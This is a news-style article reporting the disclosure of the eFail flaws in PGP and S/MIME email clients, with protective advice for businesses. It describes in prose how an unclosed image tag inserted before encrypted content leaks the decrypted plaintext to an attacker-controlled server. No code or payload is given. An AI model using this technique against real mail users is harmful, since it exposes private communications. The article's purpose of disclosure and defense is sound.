Security researchers have urgently disclosed a set of vulnerabilities affecting email clients that utilize two prominent email encryption standards, PGP and S/MIME. This disclosure follows the inadvertent leak of their forthcoming research paper, which was initially scheduled for release tomorrow.
PGP and S/MIME serve as widely adopted end-to-end encryption protocols, designed to safeguard email communications from unauthorized access by companies, governments, or cybercriminals. However, the vulnerabilities do not originate from the encryption methods themselves; rather, they stem from the improper implementation of these technologies by certain email clients and plugins.
The vulnerabilities, referred to as eFail, present a grave risk as they may enable attackers to decrypt content from past emails that were supposed to remain secure. According to the research team’s findings, these weaknesses arise primarily from how email clients manage HTML content and external resources, such as images and stylesheets sourced from external URLs.
The eFail attack exploits the automatic decryption behavior of email clients that are also set to load external resources by default. By sending a modified version of an encrypted email, an attacker can trick a vulnerable email client into revealing the plaintext content of the original message whenever the recipient accesses it. Specifically, the attack involves injecting plaintext into the encrypted email, leading to the exfiltration of the original data once the email is decrypted.
It is important to note that attackers must first gain access to the targeted encrypted emails. They then alter the email’s content and send it back to the recipient to deceive the email client into disclosing sensitive information without notifying the user. The methodology involves transforming an encrypted email into a multipart HTML message and spoofing the sender address to make it appear legitimate.
In this nefarious alteration, an unclosed image tag is inserted right before the encrypted content. As the targeted email client decrypts the email and processes the HTML, the image request to an attacker-controlled server inadvertently sends out the decrypted content as part of the filename. This allows the attackers to capture the plaintext information at their server.
Although PGP offers integrity warnings if an email’s security is compromised, many email clients fail to display these alerts, making them susceptible to successful eFail attacks.
For protection against eFail vulnerabilities, business owners are advised to select email clients that prominently display integrity warnings and do not automatically render HTML content. The use of an authenticated encryption algorithm for sensitive communications is also encouraged. These recommendations are vital, especially given the increasing sophistication of attackers targeting email encryption users.
The research was conducted by a team including experts from Munster University of Applied Sciences and Ruhr University Bochum. For further investigation into the attack technique, interested readers may refer to the detailed findings available on the researchers’ website or access the full research paper.
In terms of potential tactics adopted by adversaries in the eFail incidents, the MITRE ATT&CK Framework identifies relevant techniques such as initial access through social engineering, execution via external content loading, and data exfiltration utilizing clever manipulation of email structures. These insights underscore the importance of vigilance and robust security practices in today’s environment of increasing cyber threats.
